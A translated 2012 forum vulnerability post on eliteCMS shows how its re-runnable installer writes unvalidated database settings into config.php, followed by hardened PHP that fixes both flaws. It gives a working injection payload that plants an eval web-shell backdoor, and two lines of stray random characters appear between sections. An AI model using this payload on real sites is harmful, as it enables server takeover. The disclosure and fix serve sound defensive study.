eliteCMS install file not verified + one-liner shell write vulnerability

Original poster, posted 2012-11-18 13:59:27
After installation completes, eliteCMS's install script is not locked, so an attacker can re-run the installation by visiting the installer's URL.

Another vulnerability: the installer can write a one-liner shell straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...(omitted)...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
; P3 [2 R: ?$ u9 a& m
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor is written into /admin/includes/config.php.
+ D$ x5 J. Y5 K6 n
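As an added example (this is not eliteCMS's own code and is not from the post above), here is a hardened form of the step-4 writer that closes both holes described: the installer refuses every step once an install.lock file exists, the database settings are whitelisted before use, and config.php is generated with var_export() so that whatever the user submitted ends up inside a PHP string literal instead of being pasted into code. The lock-file name, the file paths and the switch from the removed mysql_* functions to mysqli in the generated file are assumptions.

```php
<?php
// Added example, not eliteCMS code. Paths and lock-file name are assumptions.
define('INSTALL_LOCK', __DIR__ . '/install.lock');
define('CONFIG_FILE',  __DIR__ . '/../admin/includes/config.php');

// Once installation has completed, the lock file exists and the installer
// must refuse to run. This check has to sit at the top of install.php so it
// covers every step, not only the final one that writes config.php.
function install_is_locked(): bool
{
    return file_exists(INSTALL_LOCK);
}

// Validate each value before it goes anywhere near generated code.
// Host: hostname/IP with optional :port, or a unix socket path.
// DB name / user: MySQL identifier characters only (no quotes, no "?>").
function validate_db_settings(array $in): array
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$|^\/[\w\/.\-]+$/',
        'DB_NAME'   => '/^[A-Za-z0-9_$]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        $v = (string)($in[$key] ?? '');
        if (!preg_match($re, $v)) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $out[$key] = $v;
    }
    // A password may legitimately contain any character. It is never pasted
    // into code as raw text, only emitted through var_export() below, so no
    // whitelist is applied here.
    $out['DB_PASS'] = (string)($in['DB_PASS'] ?? '');
    return $out;
}

// Build config.php with var_export(): every value becomes a single-quoted PHP
// string literal with backslashes and quotes escaped. The payload from the post,
//   "?><?php eval($_POST[c]);?><?php
// therefore stays inside the quotes; a "?>" inside a string literal does not
// end PHP mode, so it is data, not code.
function render_config(array $s): string
{
    $code = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        $code .= 'define(' . var_export($k, true) . ', ' . var_export($s[$k], true) . ");\n";
    }
    $code .= '$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);' . "\n";
    $code .= 'if (!$connection) { die("Database connection failed: " . mysqli_connect_error()); }' . "\n";
    return $code; // no closing ?> tag, so the file cannot emit stray whitespace
}

// Write the file atomically, then drop the lock so the installer cannot be
// re-run to overwrite config.php.
function write_config(array $settings): void
{
    $code = render_config(validate_db_settings($settings));
    $tmp  = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, $code, LOCK_EX) === false || !rename($tmp, CONFIG_FILE)) {
        exit('Could not write config.php');
    }
    // Create the lock last: a failed write must not leave the installer locked.
    file_put_contents(INSTALL_LOCK, date('c'), LOCK_EX);
}

// Request handling: block every step once the lock exists.
if (install_is_locked()) {
    http_response_code(403);
    exit('Installation already completed. Remove install.lock to reinstall.');
}

if (($_GET['step'] ?? '') === '4') {
    // Values still come from the session, as in the original flow, but they
    // are validated and escaped here rather than trusted.
    write_config([
        'DB_SERVER' => $_SESSION['DB_SERVER'] ?? '',
        'DB_NAME'   => $_SESSION['DB_NAME']   ?? '',
        'DB_USER'   => $_SESSION['DB_USER']   ?? '',
        'DB_PASS'   => $_SESSION['DB_PASS']   ?? '',
    ]);
}
```

The whitelist and the var_export() escaping are independent defences: the whitelist rejects the post's payload outright because of the quote, `<`, `?` and `;` characters, while the escaping would keep it harmless even for a field like the password that cannot be whitelisted. The lock check is the fix for the first issue in the post; the usual belt-and-braces is to also delete the install directory once setup has finished.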